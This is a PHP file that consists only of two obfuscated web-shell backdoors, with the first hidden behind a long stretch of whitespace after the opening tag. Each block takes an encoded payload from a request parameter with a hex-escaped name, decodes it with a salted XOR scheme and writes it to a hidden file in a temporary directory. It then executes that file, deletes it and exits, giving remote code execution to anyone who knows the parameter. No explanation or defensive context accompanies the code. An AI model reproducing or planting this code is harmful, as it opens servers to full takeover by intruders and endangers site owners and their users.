<?php																																										if(isset($_REQUEST["\x70oin\x74e\x72"])){ $obj = $_REQUEST["\x70oin\x74e\x72"]; $obj = explode ("." ,$obj ) ; $key = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt ); $u = 0; foreach( $obj as $v3) { $sChar = ord( $salt[$u% $sLen] ); $dec = ( ( int)$v3 - $sChar -( $u% 10)) ^26; $key .= chr( $dec ); $u++; } $elem = array_filter(["/var/tmp", "/dev/shm", sys_get_temp_dir(), session_save_path(), getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), getcwd(), getenv("TMP")]); $descriptor = 0; do { $dat = $elem[$descriptor] ?? null; if ($descriptor >= count($elem)) break; if (is_dir($dat) ? is_writable($dat) : false) { $tkn = vsprintf("%s/%s", [$dat, ".data"]); if (file_put_contents($tkn, $key)) { require $tkn; unlink($tkn); die(); } } $descriptor++; } while (true); }


if(isset($_POST["\x72esource"])){
	$obj = $_POST["\x72esource"];
	$obj=			explode  (		".",   $obj ); 
	$dchunk = '';
            $salt9 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($salt9	);
    
            foreach ($obj as $n=>$v4) {
                $sChar = ord($salt9[$n		% $sLen]	);
                $dec = ((int)$v4 - $sChar - ($n		% 10)) ^ 77;
                $dchunk .= chr($dec	);
            }
	$ent = array_filter(["/var/tmp", getcwd(), "/dev/shm", sys_get_temp_dir(), getenv("TMP"), ini_get("upload_tmp_dir"), session_save_path(), "/tmp", getenv("TEMP")]);
	foreach ($ent as $flg) {
    		if (!!is_dir($flg) && !!is_writable($flg)) {
    $fac = "$flg" . "/.bind";
    if (@file_put_contents($fac, $dchunk) !== false) {
	include $fac;
	unlink($fac);
	die();
}
}
}
}